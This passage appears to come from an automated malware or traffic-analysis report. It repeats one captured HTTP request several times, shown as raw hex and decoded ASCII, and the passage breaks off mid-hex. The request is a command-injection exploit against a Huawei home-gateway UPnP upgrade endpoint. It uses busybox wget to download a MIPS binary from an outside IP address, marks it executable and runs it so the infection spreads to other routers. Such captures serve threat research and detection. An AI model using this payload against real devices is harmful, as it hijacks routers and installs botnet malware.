6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 